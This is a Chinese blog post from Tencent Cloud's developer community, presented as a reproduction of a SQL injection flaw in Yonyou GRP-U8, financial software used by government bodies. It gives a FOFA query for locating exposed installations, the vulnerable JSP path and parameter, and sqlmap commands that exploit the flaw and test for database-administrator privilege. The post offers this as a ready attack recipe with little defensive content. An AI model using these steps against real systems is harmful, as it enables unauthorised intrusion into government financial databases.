前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞

【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞

作者头像
没事就要多学习
发布2024-07-18 15:48:27
1260
发布2024-07-18 15:48:27
举报
文章被收录于专栏:Cyber Security
一、漏洞描述

用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png

二、网络空间搜索引擎搜索

fofa查询语法

代码语言:javascript
复制
app="用友-GRP-U8"
在这里插入图片描述
在这里插入图片描述

三、漏洞利用

POC:拼接/u8qx/slbmbygr.jsp?gsdm=1 访问

在这里插入图片描述
在这里插入图片描述

漏洞存在

在这里插入图片描述
在这里插入图片描述

漏洞不存在

使用SQLmap进行注入利用

代码语言:javascript
复制
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*"
在这里插入图片描述
在这里插入图片描述

查询当前用户权限

代码语言:javascript
复制
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba    
在这里插入图片描述
在这里插入图片描述
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、漏洞描述
  • 二、网络空间搜索引擎搜索
  • 三、漏洞利用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档